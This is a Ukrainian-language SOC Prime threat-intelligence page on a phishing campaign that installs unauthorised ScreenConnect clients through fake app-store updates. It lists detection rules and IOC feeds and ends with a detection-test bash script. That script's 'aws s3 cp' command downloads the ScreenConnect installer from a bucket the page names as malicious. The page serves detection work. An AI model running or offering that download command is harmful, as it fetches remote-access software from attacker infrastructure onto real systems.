SOC Prime Bias: Високий

11 Aug 2026 06:17 UTC

Масштабне поширення ScreenConnect через фішинг із темою App Store

Author Photo
SOC Prime Team linkedin icon Стежити
Масштабне поширення ScreenConnect через фішинг із темою App Store
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Широкомасштабна фішингова кампанія використовує передові методи соціальної інженерії для розгортання несанкціонованих клієнтів ConnectWise ScreenConnect. Атакуючі видають себе за довірені сервіси, такі як магазин Microsoft Store, Apple App Store та Google Meet, за допомогою динамічного веб-контенту та фальшивих оновлень. Після встановлення ПЗ віддаленого управління забезпечує загрозливим акторам постійний віддалений доступ до скомпрометованих систем.

Розслідування

Команда LevelBlue OpsCTI виявила цю кампанію шляхом аналізу фальшивої фішингової платформи оновлень та повторно використаної інфраструктури. Дослідники ідентифікували послідовні структури директорій, повторювані хеші HTTP ресурсів та скрипти на базі ІІ для профілювання потенційних жертв. Розслідування також виявило зловживання API бота Telegram для телеметрії в реальному часі та звітування про інфікування.

Захист

Організації повинні пріоритетом виявляти несанкціоноване ПЗ віддаленого управління та контролювати виконувані завантаження з невідомих загальнодоступних хмарних сервісів, таких як Amazon S3 або Cloudflare R2. Також рекомендується керування для ідентифікації брендів, що видаються, та несанкціонованого трафіку API Telegram Bot. Регулярні ревізії запасів кінцевих точок можуть допомогти виявити самовільні установки ScreenConnect та існуючий компроміс.

Відповідь

Якщо підозрюється компроміс, уражені системи слід негайно ізолювати, а будь-які клієнти ScreenConnect, що спілкуються з несанкціонованими вузликами, слід розслідувати. Журнали мережі повинні бути переглянуті на предмет підозрілих з’єднань з відомими фішинговими доменами або кінцевими точками зберігання у хмарі. Відповідачі також повинні дослідити процеси, які запускаються msiexec.exe або PowerShell, що завантажують файли з зовнішніх джерел.

Потік атаки

Виявлення

Можливість виконання через приховані командні рядки PowerShell (через cmdline)

Команда SOC Prime
10 Сер 2026

Виклик підозрілих методів .NET з Powershell (через powershell)

Команда SOC Prime
10 Сер 2026

Можливе виконання файлів Msiexec у незвичайній директорії (через cmdline)

Команда SOC Prime
10 Сер 2026

Альтернативне ПЗ віддаленого доступу / управління (через process_creation)

Команда SOC Prime
10 Сер 2026

Можливе зловживання доменом розробки Cloudflare (через dns)

Команда SOC Prime
10 Сер 2026

Підозріла команда та управління через незвичайний домен верхнього рівня (TLD) запиту DNS (через dns)

Команда SOC Prime
10 Сер 2026

IOCs (HashSha256) для виявлення: Поза ‘Фальшивими Оновленнями’: Від фішингу у стилі магазинів додатків до масштабного розповсюдження ScreenConnect

Правила SOC Prime AI
10 Сер 2026

IOCs (SourceIP) для виявлення: Поза ‘Фальшивими Оновленнями’: Від фішингу у стилі магазинів додатків до масштабного розповсюдження ScreenConnect

Правила SOC Prime AI
10 Сер 2026

IOCs (DestinationIP) для виявлення: Поза ‘Фальшивими Оновленнями’: Від фішингу у стилі магазинів додатків до масштабного розповсюдження ScreenConnect

Правила SOC Prime AI
10 Сер 2026

Виконання несанкціонованої інсталяції ScreenConnect через фішинг [Створення процесу Windows]

Правила SOC Prime AI
10 Сер 2026

Виявлення завантаження інсталятора ScreenConnect із підозрілих S3-кошиків [AWS Cloudtrail]

Правила SOC Prime AI
10 Сер 2026

Виконання симуляції

Необхідна умова: Телекерування та передперевірка базових ліній повинні пройти.

Причина: Цей розділ деталізує точне виконання техніки противника (TTP), призначене для запуску правил виявлення. Команди та наратив МАЮТЬ безпосередньо відображати виявлені TTP та прямують для генерації точної телеметрії, що очікується за логікою виявлення. Абстрактні або нерелевантні приклади приведуть до помилкової діагностики.

  • Наратив атаки та команди: Атакуючий здійснив фішингову кампанію. Щоб уникнути виявлення антивірусами на основі файлів, вони розміщають легітимне ПЗ з віддаленим доступом (ScreenConnect) в публічному кошику AWS S3, що імітує легітимне розповсюдження програмного забезпечення. Атакуючий інструктує жертву завантажити інсталятор. Ця дія запускає GetObject подію в AWS CloudTrail, націлену на специфічний зловмисний кошик eobtdk.s3.us-east-2.amazonaws.com та специфічне ім’я файлу ScreenConnect.ClientSetup.msi.

  • Сценарій регресійного тесту: [Note: Since we cannot interact with real malicious buckets, this script simulates the запит який створить запис журналу, якщо кошик існував би.

    #!/bin/bash
    # Сценарій симуляції для запуску правила виявлення CloudTrail
    # Це імітує API виклик, який зробив би противник для завантаження інструмента
    
    echo "[+] Початок симуляції: Завантаження ScreenConnect з зловмисного S3..."
    
    # Ми використовуємо AWS CLI для спроби Get запиту.
    # Навіть якщо кошик не існує, спроба 'запиту' створює подію CloudTrail
    # в реальному середовищі, де кошик налаштований.
    
    aws s3 cp s3://eobtdk/ScreenConnect.ClientSetup.msi . --region us-east-2
    
    echo "[+] Команда симуляції відправлена. Перевірте CloudTrail на події GetObject, націлені на 'eobtdk.s3.us-east-2.amazonaws.com'."
  • Команди очищення:

    # Видалити будь-які файли, завантажені під час симуляції
    rm -f ScreenConnect.ClientSetup.msi